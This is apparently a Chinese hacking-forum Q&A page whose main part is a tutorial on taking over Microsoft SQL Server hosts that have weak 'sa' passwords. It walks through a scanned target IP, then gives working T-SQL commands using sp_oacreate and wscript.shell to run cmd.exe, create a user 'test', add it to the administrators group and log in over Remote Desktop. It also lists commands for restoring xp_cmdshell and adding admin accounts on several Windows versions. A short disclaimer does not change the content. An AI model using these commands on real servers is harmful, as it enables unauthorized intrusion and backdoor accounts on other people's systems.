『壹』 sql查詢分析器用不了怎麼回事
1. 軟體本身有問題,下載個新的。
2. 網吧的機子對這個軟體不支持或與其他軟體沖突。
『貳』 拒絕了對對象 'xp_cmdshell'(資料庫 'master',所有者 'dbo')的 EXECUTE 許可權的問題急
當sa儲存擴展被刪除後....sa弱口令相關命令
可不知道大家有無這樣的經歷?當用sql綜合利用工具連接成功後,有的能直接執行命令,創建帳戶,
有的執行命令時卻遇上下面種種情況而使你辛苦掃得的sa 弱口令失效,功虧一簣~
例如執行命令後回顯1:未能找到存儲過程'master..xpcmdshell'.
回顯2:無法裝載 DLL xpsql70.dll 或該DLL所引用的某一 DLL。原因126(找不到指定模塊。)
回顯3:拒絕了對對象 'xp_cmdshell'(資料庫 'master',所有者 'dbo')的 EXECUTE 許可權。
等等可能還有些吧。這幾個比較常見。
碰上這種情況,小菜們就變得無所適從了,棰胸跺足,甚至侮辱斯文,臭罵管理員。。。
呵呵,俺認為,回顯1,2一般要麼是管理員lj,要麼是中級菜友的傑作,一般都是可以恢復的shell。回顯3可就是經典作品了,把sa的許可權降低了,與systemadmin脫離了聯系。。。對於這種情況,俺還沒有更好的解決辦法。(哪位大哥知道麻煩告訴我一聲^_^)
下面我就具體演示一下我是怎麼對付這樣的情況的。
用到的工具:sql查詢分離器休閑庄專用版。
怕大家找不到,我把下載地址給大家
SQL查詢分析器休閑庄分離版本
http://soft.7747.net/ware/774710/sqlquery.zip
假如我們掃到了:
[219.84.135.161]: 發現SQL-Server弱口令 "sa/[口令與用戶名相同]"
[219.84.135.161]: "SQL-Server弱口令"掃描完成, 發現 1.
還開了3389!
先打開sql綜合利用工具
連接試試
看,連接成功。
執行命令時,回顯
無法載入 DLL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplo.dll,或是參考到某個 DLL 。原因: 126(找不到指定的模組。)。
這個時候,我們就沒辦法再繼續下去了。
下面打開sql查詢分離器
登陸進去
出來一個白白的這個。。。
呵呵
哦。
這個ip是開了3389的。
我們先登陸3389看是否成功。
忘記講了
看。windows2000的server版
好了。我們再在sql查詢分離器中輸入命令
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user test 123 /add'
這個命令就是創建一個用戶名為test,密碼為123的用戶,
輸入後按F5
我們看到回顯有個這個表格樣的東東,0。這樣的。
這就表示成功了。如果回顯「命令成功完成」,反而是沒有成功~
呵呵不要上當哦。
下面提升test的許可權
輸入命令
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators test /add'
把test提升為管理員
按F5執行命令,回顯和剛才一樣。。。
下面我們登陸3389
用帳戶test
密碼123
看能不能登陸,看。。。。
進去了吧。。。
呵呵。。。
**********************************************************************************
sa弱口令相關命令
總結的一些關於sa弱口令相關命令.
注:具體問題具體分析,以上方法僅供參考,不一定有效,相關原理知識請自行查找。重要提示!以上提供的方法僅供學習研究!請大家不要進行任何破壞國內主機的違法行為!否則一切後果自負!轉載請保留此信息。
一.更改sa口令方法:
用sql綜合利用工具連接後,執行命令:
exec sp_password NULL,'新密碼','sa'
(提示:慎用!)
二.簡單修補sa弱口令.
方法1:查詢分離器連接後執行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
然後按F5鍵命令執行完畢
方法2:查詢分離器連接後
第一步執行:use master
第二步執行:sp_dropextendedproc 'xp_cmdshell'
然後按F5鍵命令執行完畢
三.常見情況恢復執行xp_cmdshell.
1 未能找到存儲過程'master..xpcmdshell'.
恢復方法:查詢分離器連接後,
第一步執行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然後按F5鍵命令執行完畢
2 無法裝載 DLL xpsql70.dll 或該DLL所引用的某一 DLL。原因126(找不到指定模塊。)
恢復方法:查詢分離器連接後,
第一步執行:sp_dropextendedproc "xp_cmdshell"
第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然後按F5鍵命令執行完畢
3 無法在庫 xpweb70.dll 中找到函數 xp_cmdshell。原因: 127(找不到指定的程序。)
恢復方法:查詢分離器連接後,
第一步執行:exec sp_dropextendedproc 'xp_cmdshell'
第二步執行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然後按F5鍵命令執行完畢
四.終極方法.
如果以上方法均不可恢復,請嘗試用下面的辦法直接添加帳戶:
查詢分離器連接後,
2000servser系統:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用戶 密碼 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用戶 /add'
xp或2003server系統:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用戶 密碼 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用戶 /add'